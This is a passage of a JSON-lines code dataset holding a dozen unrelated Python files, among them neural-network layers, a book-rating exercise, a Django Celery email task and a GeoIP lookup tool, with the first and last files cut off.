nn.Parameter(-torch.arange(1., n) / 2, requires_grad=True) # layer weights\n\n def forward(self, x):\n y = x[0] # no weight\n if self.weight:\n w = torch.sigmoid(self.w) * 2\n for i in self.iter:\n y = y + x[i + 1] * w[i]\n else:\n for i in self.iter:\n y = y + x[i + 1]\n return y\n\n\nclass GhostConv(nn.Module):\n # Ghost Convolution https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k=1, s=1, g=1, act=True): # ch_in, ch_out, kernel, stride, groups\n super(GhostConv, self).__init__()\n c_ = c2 // 2 # hidden channels\n self.cv1 = Conv(c1, c_, k, s, g, act)\n 
self.cv2 = Conv(c_, c_, 5, 1, c_, act)\n\n def forward(self, x):\n y = self.cv1(x)\n return torch.cat([y, self.cv2(y)], 1)\n\n\nclass GhostBottleneck(nn.Module):\n # Ghost Bottleneck https://github.com/huawei-noah/ghostnet\n def __init__(self, c1, c2, k, s):\n super(GhostBottleneck, self).__init__()\n c_ = c2 // 2\n self.conv = nn.Sequential(GhostConv(c1, c_, 1, 1), # pw\n DWConv(c_, c_, k, s, act=False) if s == 2 else nn.Identity(), # dw\n GhostConv(c_, c2, 1, 1, act=False)) # pw-linear\n self.shortcut = nn.Sequential(DWConv(c1, c1, k, s, act=False),\n Conv(c1, c2, 1, 1, act=False)) if s == 2 else nn.Identity()\n\n def forward(self, x):\n return self.conv(x) + self.shortcut(x)\n\n\nclass MixConv2d(nn.Module):\n # Mixed Depthwise Conv https://arxiv.org/abs/1907.09595\n def __init__(self, c1, c2, k=(1, 3), s=1, equal_ch=True):\n super(MixConv2d, self).__init__()\n groups = len(k)\n if equal_ch: # equal c_ per group\n i = torch.linspace(0, groups - 1E-6, c2).floor() # c2 indices\n c_ = [(i == g).sum() for g in range(groups)] # intermediate channels\n else: # equal weight.numel() per group\n b = [c2] + [0] * groups\n a = np.eye(groups + 1, groups, k=-1)\n a -= np.roll(a, 1, axis=1)\n a *= np.array(k) ** 2\n a[0] = 1\n c_ = np.linalg.lstsq(a, b, rcond=None)[0].round() # solve for equal weight indices, ax = b\n\n self.m = nn.ModuleList([nn.Conv2d(c1, int(c_[g]), k[g], s, k[g] // 2, bias=False) for g in range(groups)])\n self.bn = nn.BatchNorm2d(c2)\n self.act = nn.LeakyReLU(0.1, inplace=True)\n\n def forward(self, x):\n return x + self.act(self.bn(torch.cat([m(x) for m in self.m], 1)))\n\n\nclass Ensemble(nn.ModuleList):\n # Ensemble of models\n def __init__(self):\n super(Ensemble, self).__init__()\n\n def forward(self, x, augment=False):\n y = []\n for module in self:\n y.append(module(x, augment)[0])\n return torch.cat(y, 1), None # ensembled inference output, train output\n","sub_path":"models/proposal.py","file_name":"proposal.py","file_ext":"py","file_size_in_byte":11376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89354332","text":"class User(object):\n def __init__(self, name, email):\n self.name = name\n self.email = email\n self.books = {}\n\n def get_email(self):\n return self.email\n\n def change_email(self, address):\n self.email = address\n print(\"New email: {email}\".format(email=address))\n\n def read_book(self, book, rating=None):\n self.books[book] = rating\n\n def get_average_rating(self):\n rate = 0\n for ra in self.books.values():\n # print(ra)\n if type(ra) == int:\n rate += ra\n return rate/len(self.books.values())\n\n def __repr__(self):\n return \"User: {user}, email: {email}\".format(user=self.name, email=self.email)\n\n def __eq__(self, other_user):\n if isinstance(other_user, self.__class__):\n return self.name == other_user.name and self.email == other_user.email\n return False\n\n\nclass Book:\n\n def __init__(self, title, isbn):\n self.title = title\n self.isbn = isbn\n self.ratings = []\n\n def get_title(self):\n return self.title\n\n def get_isbn(self):\n return self.isbn\n\n def set_isbn(self, newIsbn):\n self.isbn = newIsbn\n print(\"{book} ISBN has been updated to {isbn}\".format(book=self.title, isbn=self.isbn))\n\n def add_rating(self, rating):\n if rating is not None:\n if rating >= 0 and rating <= 4:\n return self.ratings.append(rating)\n else:\n print(\"\\n Invalid Rating \\n\")\n\n def get_average_rating(self):\n if len(self.ratings) != 0:\n self.aver = sum(self.ratings)/len(self.ratings)\n 
return int(self.aver)\n else:\n return \"No ratings\"\n\n def __eq__(self, another_book):\n if isinstance(another_book, self.__class__):\n return self.title == another_book.title and self.isbn == another_book.isbn\n return False\n\n def __hash__(self):\n return hash((self.title, self.isbn))\n\n\nclass Fiction(Book):\n def __init__(self, title, author, isbn):\n super().__init__(title, isbn)\n self.author = author\n\n def get_author(self):\n return self.author\n\n def __repr__(self):\n return \"\\\"{title}\\\" by {author}\".format(title=self.title, author=self.author)\n\n\nclass Non_Fiction(Book):\n def __init__(self, title, subject, level, isbn):\n super().__init__(title, isbn)\n self.subject = subject\n self.level = level\n\n def get_subject(self):\n return self.subject\n\n def get_level(self):\n return self.level\n\n def __repr__(self):\n return \"\\\"{title},\\\" a {level} manual on {subject}\".format(title=self.title, level=self.level, subject=self.subject)\n\n\nclass TomeRater:\n def __init__(self):\n self.users = {}\n self.books = {}\n self.isbnDic = {}\n\n def create_book(self, title, isbn):\n self.isbnDic[title] = isbn\n return Book(title, isbn)\n\n def create_novel(self, title, author, isbn):\n self.isbnDic[title] = isbn\n return Fiction(title, author, isbn)\n\n def create_non_fiction(self, title, subject, level, isbn):\n self.isbnDic[title] = isbn\n return Non_Fiction(title, subject, level, isbn)\n\n def add_book_to_user(self, book, email, rating=None):\n if email not in self.users.keys():\n return \"No user with email {}\".format(email)\n else:\n self.users[email].read_book(book, rating)\n book.add_rating(rating)\n if book not in self.books.keys():\n self.books[book] = 1\n else:\n self.books[book] += 1\n\n def add_user(self, name, email, user_books=None):\n validEmail = [\".com\", \".edu\", \".org\"]\n if email not in self.users.keys():\n if email[-4:] in validEmail and \"@\" in email:\n self.users[email] = User(name, email)\n if user_books is not None:\n for boo in user_books:\n self.add_book_to_user(boo, email)\n else:\n print(\"Invalid email for {user} {email}\".format(user=name, email=email))\n else:\n print(\"{} user already exists.\".format(self.users[email]))\n\n def print_catalog(self):\n for boo in self.books.keys():\n print(boo)\n\n def print_users(self):\n for us in self.users.values():\n print(us)\n\n def print_isbnDic(self):\n for key, val in self.isbnDic.items():\n print(key, val)\n\n def get_most_read_book(self):\n newKey = \"\"\n newVal = 0\n for key, val in self.books.items():\n if val > newVal:\n newVal = val\n newKey = key.title\n return newKey, newVal\n\n def highest_rated_book(self):\n newKey = \"\"\n newVal = 0\n for key in self.books.keys():\n if key.get_average_rating() == \"No ratings\":\n continue\n elif key.get_average_rating() > newVal:\n newVal = key.get_average_rating()\n newKey = key.title\n return newKey, newVal\n\n def most_positive_user(self):\n posUser = \"\"\n newVal = 0\n for use in self.users.values():\n if use.get_average_rating() > newVal:\n posUser = use\n newVal = use.get_average_rating()\n return posUser, newVal\n\n def __repr__(self):\n numUsers = len(self.users.values())\n numBooks = len(self.books.keys())\n return \"There are {numUsers} users and {numBooks} books in TomeRater!\".format(numUsers=numUsers, numBooks=numBooks)\n\n\nTome_Rater = TomeRater()\n\n# Create some books:\nbook1 = Tome_Rater.create_book(\"Society of Mind\", 12345678)\nnovel1 = Tome_Rater.create_novel(\"Alice In Wonderland\", \"Lewis Carroll\", 
12345)\nnovel1.set_isbn(9781536831139)\nnonfiction1 = Tome_Rater.create_non_fiction(\n \"Automate the Boring Stuff\", \"Python\", \"beginner\", 1929452)\nnonfiction2 = Tome_Rater.create_non_fiction(\n \"Computing Machinery and Intelligence\", \"AI\", \"advanced\", 11111938)\nnovel2 = Tome_Rater.create_novel(\"The Diamond Age\", \"Neal Stephenson\", 10101010)\nnovel3 = Tome_Rater.create_novel(\"There Will Come Soft Rains\", \"Ray Bradbury\", 10001000)\n\n# Create users:\nTome_Rater.add_user(\"Alan Turing\", \"alan@turing.com\")\nTome_Rater.add_user(\"David Marr\", \"david@computation.org\")\n\n# Add a user with three books already read:\nTome_Rater.add_user(\"Marvin Minsky\", \"marvin@mit.edu\", user_books=[book1, novel1, nonfiction1])\n\n# Add books to a user one by one, with ratings:\nTome_Rater.add_book_to_user(book1, \"alan@turing.com\", 1)\nTome_Rater.add_book_to_user(novel1, \"alan@turing.com\", 3)\nTome_Rater.add_book_to_user(nonfiction1, \"alan@turing.com\", 3)\nTome_Rater.add_book_to_user(nonfiction2, \"alan@turing.com\", 4)\nTome_Rater.add_book_to_user(novel3, \"alan@turing.com\", 1)\n\nTome_Rater.add_book_to_user(novel2, \"marvin@mit.edu\", 2)\nTome_Rater.add_book_to_user(novel3, \"marvin@mit.edu\", 2)\nTome_Rater.add_book_to_user(novel3, \"david@computation.org\", 4)\nTome_Rater.add_book_to_user(novel3, \"bin@computation.org\", 20)\n\n\n# Uncomment these to test your functions:\nprint(\"\\nCatalog: \\n\")\nTome_Rater.print_catalog()\nprint(\"\\nUsers: \\n\")\nTome_Rater.print_users()\nprint(\"\\nISBN: \\n\")\nTome_Rater.print_isbnDic()\nprint(\"\\n \\n\")\n","sub_path":"TomeRater_Agostino_062518/TomeRater.py","file_name":"TomeRater.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"79794013","text":"\"\"\"\r\nIn these days of Lockdown, Motu's Father bussiness is in Loss. On Zeroth day of Lockdown the loss was Rs P, then Rs Q on the First day. Motu observed loss as a function and wanted to calculate the loss on Nth day of the Lockdown. He observed that the loss is dependent on the previous days, i.e. F(n)=F(n−1)+F(n−2)+F(n−1)∗F(n−2)\r\nYou are given the loss on Zeroth day and the First day of Lockdown. You have to find the loss on Nth day.\r\n\"\"\"\r\n\r\nmod = 10**9 + 7\r\n\r\ndef fib(n): \r\n F = [[1, 1], \r\n [1, 0]] \r\n if (n == 0): \r\n return 0\r\n power(F, n - 1) \r\n \r\n return F[0][0] \r\n \r\ndef multiply(F, M): \r\n \r\n x = (F[0][0] * M[0][0] + F[0][1] * M[1][0])%(mod-1)\r\n y = (F[0][0] * M[0][1] + F[0][1] * M[1][1])%(mod-1)\r\n z = (F[1][0] * M[0][0] + F[1][1] * M[1][0])%(mod-1)\r\n w = (F[1][0] * M[0][1] + F[1][1] * M[1][1])%(mod-1)\r\n \r\n F[0][0] = x \r\n F[0][1] = y \r\n F[1][0] = z \r\n F[1][1] = w \r\n \r\n# Optimized version of \r\n# power() in method 4 \r\ndef power(F, n): \r\n \r\n if( n == 0 or n == 1): \r\n return; \r\n M = [[1, 1], \r\n [1, 0]]; \r\n \r\n power(F, n // 2) \r\n multiply(F, F) \r\n \r\n if (n % 2 != 0): \r\n multiply(F, M) \r\n\r\nt = int(input())\r\nfor _ in range(t):\r\n p, q, n = map(int, input().split())\r\n if n == 0:\r\n print(p)\r\n continue\r\n \r\n f1 = fib(n)\r\n f2 = fib(n-1)\r\n ans = pow(p+1, f2, mod)*pow(q+1, f1, mod)\r\n ans -= 1\r\n ans %= mod\r\n\r\n print(ans)\r\n","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"520054958","text":"#! 
/usr/bin/env python3 \n\nimport os \nfrom time import sleep \n\na=1\n\npid=os.fork()\n\nif pid < 0:\n print('创建失败')\n\nelif pid == 0:\n b=1\n s=0\n while b < 10:\n s += a\n b += 1\n\n print('s=',s)\n\nelse:\n sleep(1)\n print('父进程结束')\n\n","sub_path":"网络/pythonNet/day4/forklianxi.py","file_name":"forklianxi.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"57745925","text":"import tools\nimport positions\n\ndef runit(display=True):\n l=tools.Layout(100,50,50.,0.1)\n l.ball.x=30\n l.ball.y=25\n # layout,x,y,jersey,team\n home_runner1=positions.Runner(l,5,20,1,1)\n home_runner2=positions.Runner(l,15,25,2,1)\n home_runner3=positions.Runner(l,5,30,3,1)\n home_runner4=positions.Runner(l,5,35,4,1)\n home_bruiser1=positions.Bruiser(l,40,30,5,1)\n home_bruiser2=positions.Bruiser(l,40,25,6,1)\n home_bruiser3=positions.Bruiser(l,40,20,7,1)\n home_catcher1=positions.Catcher(l,95,45,8,1)\n home_thrower1=positions.Thrower(l,40,10,9,1)\n home_thrower2=positions.Thrower(l,40,20,9,1)\n home_thrower3=positions.Thrower(l,40,30,9,1)\n home_thrower4=positions.Thrower(l,40,40,9,1)\n #\n away_runner1=positions.Runner(l,95,20,1,-1)\n away_runner2=positions.Runner(l,95,26,2,-1)\n away_runner3=positions.Runner(l,95,31,3,-1)\n away_runner4=positions.Runner(l,95,20,4,-1)\n away_thrower1=positions.Thrower(l,90,10,9,-1)\n away_thrower2=positions.Thrower(l,90,20,9,-1)\n away_thrower3=positions.Thrower(l,90,30,9,-1)\n away_thrower4=positions.Thrower(l,90,40,9,-1)\n #\n l.add_player(home_thrower1)\n l.add_player(home_thrower2)\n l.add_player(home_thrower3)\n l.add_player(home_thrower4)\n l.add_player(away_thrower1)\n l.add_player(away_thrower2)\n l.add_player(away_thrower3)\n l.add_player(away_thrower4)\n #l.add_player(home_runner1)\n #l.add_player(home_runner2)\n #l.add_player(home_catcher1)\n #l.add_player(home_thrower)\n #l.add_player(home_runner3)\n #l.add_player(home_runner4)\n #l.add_player(home_bruiser1)\n #l.add_player(home_bruiser2)\n #l.add_player(home_bruiser3)\n #l.add_player(away_runner1)\n #l.add_player(away_runner2)\n #l.add_player(away_runner3)\n #l.add_player(away_runner4)\n\n l.run_game(display)\n\n#runit()\n","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"232307757","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\nimport traceback\nfrom decimal import Decimal\nfrom collections import deque,defaultdict\nfrom log import ExtendEntry\nsys.path.append('python-tools')\nfrom group import UnsortedInputGrouper,Group\n\nclass Data(object):\n def __init__(self):\n self.repeats = 0\n self.total = 0\n\nclass IntervalGroup(Group):\n def __init__(self, tup):\n super(IntervalGroup, self).__init__(tup)\n self.queries = deque()\n self.counts = defaultdict(Data)\n\n def add(self, chunks):\n e = ExtendEntry.parseChunks(chunks)\n name = e.query.question\n time = e.time\n\n while len(self.queries) > 0 and abs(time - self.queries[-1][1]) > args.limit:\n self.queries.pop()\n\n queried = set([name])\n for nn,tt in self.queries:\n known = len(queried)\n self.counts[known].total += 1\n if nn not in queried:\n queried.add(nn)\n else:\n self.counts[known].repeats += 1\n\n self.queries.appendleft( (name,time) )\n\n def done(self):\n for d in sorted(self.counts):\n args.outfile.write(' '.join(self.tup + map(str, [d, self.counts[d].repeats, self.counts[d].total])) + 
'\\n')\n\nif __name__ == \"__main__\":\n # set up command line args\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\\\n description='Probability of a new name versus number of queries')\n parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin)\n parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout)\n parser.add_argument('-l', '--limit', type=Decimal, default=Decimal('86400'))\n args = parser.parse_args()\n\n grouper = UnsortedInputGrouper(args.infile, IntervalGroup, [9], None)\n grouper.group()\n\n","sub_path":"scripts/prob_new_domain.py","file_name":"prob_new_domain.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81185699","text":"import re\n\ndef read_fasta(f):\n seqs = {}\n seqid = None\n seq = None\n for l in f:\n l = l.rstrip('\\r\\n')\n if l.startswith('>'):\n if seqid:\n seqs[seqid] = seq\n seqid = l\n seq = ''\n else:\n seq += l\n seqs[seqid] = seq\n return seqs\n\ndef chunks(s, n):\n for i in range(0, len(s), n):\n yield s[i:i+n]\n\ndef fasta_entry(sid, seq):\n s = ''\n if not sid.startswith('>'):\n sid = '>'+sid\n s += sid+'\\n'\n s += '\\n'.join(chunks(seq, 60))+'\\n'\n return s\n\nsid_splitter = re.compile(r'>(.*) \\|(.*) \\[(.*)\\]')","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"304413530","text":"import StringIO\nimport struct\nfrom bitstring import BitArray\nfrom imageformat import ImageFormat\n\nclass RGB5A3(ImageFormat):\n def __init__(self, data, width, height):\n self.blockWidth = 4\n self.blockHeight = 4\n self.blockSize = 32\n ImageFormat.__init__(self, data, width, height)\n \n def decodeBlock(self, block):\n bl = []\n s = StringIO.StringIO(block)\n \n for j in range(0, 4):\n bl.append([])\n for i in range(0, 4):\n pix = BitArray(uint=struct.unpack('>H', s.read(2))[0], length=16)\n alphaFlag = pix[:1].uint\n\n if alphaFlag == 1:\n a = 255\n r = self.colourScale(pix[1:6].uint, 32)\n g = self.colourScale(pix[6:11].uint, 32)\n b = self.colourScale(pix[11:16].uint, 32)\n else:\n a = self.colourScale(pix[1:4].uint, 8)\n r = pix[4:8].uint * 17\n g = pix[8:12].uint * 17\n b = pix[12:16].uint * 17\n\n bl[j].append((r, g, b, a))\n \n return bl","sub_path":"modules/image_formats/rgb5a3.py","file_name":"rgb5a3.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"81214064","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom celery import Celery\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template import loader\nimport os\nimport django\n\n\n# 在任务处理这一段加此代码\n# django环境初始化\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dailyfresh.settings')\ndjango.setup()\n\nfrom goods.models import GoodsType, IndexGoodsBanner, IndexPromotionBanner, IndexTypeGoodsBanner\n\napp = Celery('celery_tasks.tasks', broker='')\n\n# 定义任务函数\n@app.task\ndef send_register_active_email(to_email, username, token):\n \"\"\"发送激活邮件\"\"\"\n subject = '天天生鲜欢迎信息'\n message = ''\n sender = settings.EMAIL_FROM\n receiver = [to_email]\n html_message = f'
<h1>{username}, 欢迎您成为天天生鲜注册会员</h1>请点击下面链接激活您的账户<br/>
' \\\n f'http://127.0.0.1:8000/user/active/{token}'\n send_mail(subject, message, sender, receiver, html_message=html_message)\n\n@app.task\ndef generate_static_index_html():\n \"\"\"产生首页静态页面\"\"\"\n # 获取商品种类信息\n types = GoodsType.objects.all()\n\n # 获取首页轮播商品信息\n goods_banners = IndexGoodsBanner.objects.all().order_by('index')\n\n # 获取首页促销活动信息\n promotion_banners = IndexPromotionBanner.objects.all().order_by('index')\n\n # 获取首页分类商品展示信息\n for type in types: # GoodsType\n # 获取type种类首页分类商品的图片展示信息\n image_banners = IndexTypeGoodsBanner.objects.filter(type=type, display_type=1).order_by('index')\n # 获取type种类首页分类商品的文字展示信息\n title_banners = IndexTypeGoodsBanner.objects.filter(type=type, display_type=0).order_by('index')\n\n # 动态给type增加属性,分别保存首页分类商品的图片展示信息和文字展示信息\n type.image_banners = image_banners\n type.title_banners = title_banners\n\n # 组织模板上下文\n context = {\n 'types': types,\n 'goods_banners': goods_banners,\n 'promotion_banners': promotion_banners\n }\n\n temp = loader.get_template('static_index.html')\n static_index_html = temp.render(context)\n save_path = os.path.join(settings.BASE_DIR, 'static/index.html')\n with open(save_path, 'w') as f:\n f.write(static_index_html)","sub_path":"dailyfresh/celery_tasks/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"207012919","text":"import json\n\n\nfilename = \"inventory.json\"\ndoplot = True\n\n# parse the json file\nwith open(filename) as f:\n data = json.load(f)\n\ntimestep = 0\nnuclides = data['inventory_data'][timestep]['nuclides']\n\nelements = {}\nk = 'element'\nv = 'grams'\nfor n in nuclides:\n if n[k] in elements:\n elements[n[k]] += n[v]\n else:\n elements[n[k]] = n[v]\n\ntotal_grams = sum([g for e, g in elements.items()])\nfor e, g in elements.items():\n print(\"{} {:.2f}%\".format(e, g*100.0/total_grams))\n\nlabels, values = list(zip(*(list(elements.items()))))\n\nif doplot:\n import matplotlib.pyplot as plt\n plt.pie(list(values), labels=list(labels), autopct='%2.2f%%', shadow=False)\n plt.savefig('pie.pdf')\n","sub_path":"2018/exercises/4/inventory1.py","file_name":"inventory1.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"493325212","text":"import argparse\nimport os\nimport sys\n\ntry:\n sys.path.index(os.getcwd()) \nexcept ValueError:\n sys.path.append(os.getcwd()) \n\nfrom make_dependency import get_dependencies\n\n#path_to_files = ['control/code/wears_jacket.py', 'control/code/wears_jacket_with_if.py', 'control/code/is_prime.py', ]\nprefix = '../../topics'\nworksheet_source = 'src/fa20'\n\ndef generate_file(file_name, file_paths, solution=False):\n\tfile = []\n\tfor file_path in file_paths:\n\t\twith open(file_path, 'r') as f:\n\t\t\tstart = False\n\t\t\tstart_sol = False\n\t\t\tfor line in f.read().split('\\n'):\n\t\t\t\tif line.startswith(r'\\begin{solution}'):\n\t\t\t\t\tstart_sol = True\n\t\t\t\tif line == r'\\begin{lstlisting}':\n\t\t\t\t\tstart = True\n\t\t\t\telif line == r'\\end{lstlisting}':\n\t\t\t\t\tstart = False\n\t\t\t\telif start and (start_sol == solution):\n\t\t\t\t\tfile.append(line)\n\t\tfile.append(\"\\n\")\n\twith open(file_name, 'w') as f:\n\t\tf.write('\\n'.join(file) + '\\n')\n\t\t\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\t# parser.add_argument('-o', '--out_file', type=str,\n\t# help='output file')\n\tparser.add_argument('-f','--input_file', 
type=str, help='input file e.g. mentor05.tex')\n\tparser.add_argument('-s', \"--solution\", action=\"store_true\", help=\"Create Solution files too\")\n\targs = parser.parse_args()\n\tfile_paths = get_dependencies(os.path.join(worksheet_source, args.input_file))\n\tfile_paths = [p for p in file_paths if '/text/' not in p]\n\tout_file = args.input_file.replace('.tex', '.py')\n\tgenerate_file(os.path.join(worksheet_source, out_file), file_paths)\n\tif args.solution:\n\t\tsol_name = out_file.replace('.py', '_sol.py')\n\t\tgenerate_file(os.path.join(worksheet_source, sol_name), file_paths, solution=True)\n","sub_path":"scripts/latex_to_py.py","file_name":"latex_to_py.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"574375744","text":"# Hello World server in Python\n# Binds REP socket to tcp://*:5555\n\n#import time\nimport zmq\nimport numpy as np\n#from PIL import Image\n#import struct\nimport cv2\nimport inverse_perspective as ip\n\nDIMENSION = 512\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind(\"tcp://*:5555\")\nprint(\"Listening\")\n\nVID_FPS = 20\nVID_SECONDS = 20\nimages_to_save = VID_FPS*VID_SECONDS\nimgNum = 0\nimages = []\nwhile imgNum < images_to_save:\n # Wait for next request from client\n message = socket.recv()\n #message will be a 2D array of 4 element vectors (ABGR or ARGB format) that has been flattened\n\n\n###OLD CODE START\n #img_bytes = np.array(message)\n #int_message = np.zeros((DIMENSION, DIMENSION, 3), dtype=np.uint8)\n\n #We need to reshape the array from a 1D array into a 3D array of colour vectors\n #We also want to drop the alpha value as it is redundant information\n #The 1D array consists of the colour vector as 4 individual byte elements\n #So we need to reshape the array AND drop the first element of each colour \n# for x in range(0,DIMENSION):\n# for y in range(0,DIMENSION):\n# i = 4*(y*DIMENSION + x) #Index of Alpha value - ABGR or ARGB format\n# arr = np.array( [ message[i+2], message[i+1], message[i] ] )\n# int_message[DIMENSION-1-y,x] = arr\n###OLD CODE END\n\n #Force message to byte array and cast as np array\n img_bytes = np.array(bytearray(message))\n #reshape from 1D to 3D array, x, y and colour\n arr2 = np.reshape(img_bytes, (DIMENSION, DIMENSION, 4))\n #Vertical part of image needs to be flipped (differing coord systems)\n int_message = np.flip(arr2[:, :, :-1], 0)\n #Also set the data to RGB format (instead of BGR)\n img = np.flip(int_message, 2)\n \n images.append(img)\n imgNum += 1\n print(\"imgNum = \" + str(imgNum))\n\n if imgNum < images_to_save:\n socket.send(b\"Ack\")\n else:\n #socket.send_string(\"END\")\n print(img)\n socket.send(b\"END\")\n break\n\nprint(\"DONE\")\n\nDIMS = (images[0].shape[0], images[0].shape[1])\n# Define the codec and create VideoWriter object\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\n#fourcc = cv2.VideoWriter_fourcc('M','J','P','G')\nvid_path = 'D:/GitRepos/Uni/Thesis/Simulation/PythonCode/Output/Videos/unity_output.avi'\nout = cv2.VideoWriter(vid_path, \n fourcc, VID_FPS, DIMS, True)\n\nfolder_path = 'D:/GitRepos/Uni/Thesis/Simulation/PythonCode/'\n\nfor i in range(0, imgNum):\n path = 'D:/GitRepos/Uni/Thesis/Simulation/PythonCode/Output/Images/'\n num = str(i)\n if i < 10:\n num = \"00\" + str(i)\n elif i < 100:\n num = \"0\" + str(i)\n name = path + 'img_' + num + '.png'\n #images[i].save(name)\n print(\"saving \" + name)\n\n vid_frame = images[i]\n\n # if i < imgNum / 2:\n # vid_frame = 
images[i]\n # else:\n # edges = cv2.Canny(images[i], 150, 180)\n # edges = cv2.cvtColor(edges, cv2.COLOR_GRAY2RGB)\n # vid_frame = edges\n\n cv2.imwrite(name, vid_frame)\n out.write(vid_frame)\n\nout.release()\nprint(\"end\")\n","sub_path":"Simulation/PythonCode/PythonZMQServer.py","file_name":"PythonZMQServer.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"98935691","text":"#!/usr/bin/python3\nimport csv\nimport sqlite3\nimport argparse\nimport sys,os\nimport itertools\nfrom shutil import copyfile\n\n__version__ = '2.0.1'\nGEOIP_DB = os.path.join( os.path.dirname(__file__), 'geoip.db' )\n\ntry:\n\tdb = sqlite3.connect(GEOIP_DB)\nexcept:\n\tprint(\"permission denied to open %s\" % GEOIP_DB)\n\texit()\n\ndb.text_factory = str\nsql = db.cursor()\n\nitems = ['network']\nsquares = []\ncircles = []\n\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument(\"-update\", dest='update', nargs='?', const='', help='update local database from remote ZIP-archive')\narg_parser.add_argument(\"-info\", dest='info', action=\"store_true\", help='show total amount netblocks')\n\narg_parser.add_argument('-ip', dest=\"ipaddr\", action=\"append\", help='search network by IP')\narg_parser.add_argument('-network', dest=\"network\", action=\"append\", help='search network by CIDR (parent)')\narg_parser.add_argument('-networks', dest=\"networks\", action=\"append\", help='search networks by CIDR (nested)')\narg_parser.add_argument('-asn', dest=\"asn\", action=\"append\", help='search network by ASN')\narg_parser.add_argument('-org', dest=\"org\", action=\"append\", help='search networks by ASN organization')\narg_parser.add_argument('-city', dest=\"city\", action=\"append\", help='search networks in city')\narg_parser.add_argument('-country', dest=\"country\", action=\"append\", help='search networks in country')\narg_parser.add_argument('-continent', dest=\"continent\", action=\"append\", help='search networks on the continent')\narg_parser.add_argument('-square', dest=\"lat_long_lat_long\", action=\"append\", help='search networks in square area (lat,long,lat,long)')\narg_parser.add_argument('-circle', dest=\"lat_long_km\", action=\"append\", help='search networks in circle area (lat,long,km)')\n\narg_parser.add_argument(\"-resolve-rwhois\", dest=\"resolve_ripe\", action=\"store_true\", help=\"rwhois db resolve netname (faster)\")\narg_parser.add_argument(\"-resolve-whois\", dest=\"resolve_whois\", action=\"store_true\", help=\"whois resolve netname (slower)\")\n\narg_parser.add_argument(\"-kml\", dest=\"save_to_kml\", help=\"save coordinates of netblocks as KML\")\narg_parser.add_argument(\"-html\", dest=\"save_to_html\", help=\"save coordinates of netblocks as HTML\")\narg_parser.add_argument(\"-version\", dest=\"version\", action=\"store_true\", help=\"show version\")\n\narg_parser.add_argument(\"items\", nargs='*', default=['network', 'continent', 'country', 'city', 'lat', 'long'], help=\"one or more: network,asn,org,continent,country,city,lat,long\")\n\ndef check_db():\n\ttry:\n\t\tsql.execute(\"select 1 from geoip limit 1\")\n\t\treturn True\n\texcept:\n\t\treturn False\n\ndef show_db_info():\n\tcount, = sql.execute('SELECT COUNT(network) FROM geoip')\n\tprint(count[0])\n\ndef cidr_to_min_max(cidr):\n\tif len( cidr.split('/') ) == 2:\n\t\tip_begin,mask = cidr.split('/')\n\telse:\n\t\tip_begin = cidr\n\t\tmask = 32\n\ta,b,c,d = ip_begin.split('.')\n\tmask = 2**(32-int(mask)) -1\n\t_min = ( 
(int(a)<<24) + (int(b)<<16) + (int(c)<<8) + int(d) ) & ~mask\n\t_max = _min + mask\n\treturn _min,_max\n\ndef update(tmpfile, url=None):\n\timport urllib.request\n\tfrom zipfile import ZipFile\n\tfrom io import StringIO\n\n\tDB_ASN = \"http://web.archive.org/web/20191227183143/https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN-CSV.zip\"\n\tDB_COUNTRY = \"http://web.archive.org/web/20191227183011/https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip\"\n\tDB_CITY = \"http://web.archive.org/web/20191227182816if_/https://geolite.maxmind.com/download/geoip/database/GeoLite2-City-CSV.zip\"\n\n\tdef download(uri,target):\n\t\tprint(uri)\n\t\tresp = urllib.request.urlopen(uri)\n\t\tsize = int( resp.headers.get('content-length') or resp.headers.get('x-archive-orig-content-length') or 0 )\n\t\tdownloaded = 0\n\t\twhile True:\n\t\t\tdata = resp.read(4096)\n\t\t\tif not data:\n\t\t\t\tbreak\n\t\t\ttarget.write(data)\n\t\t\tdownloaded += 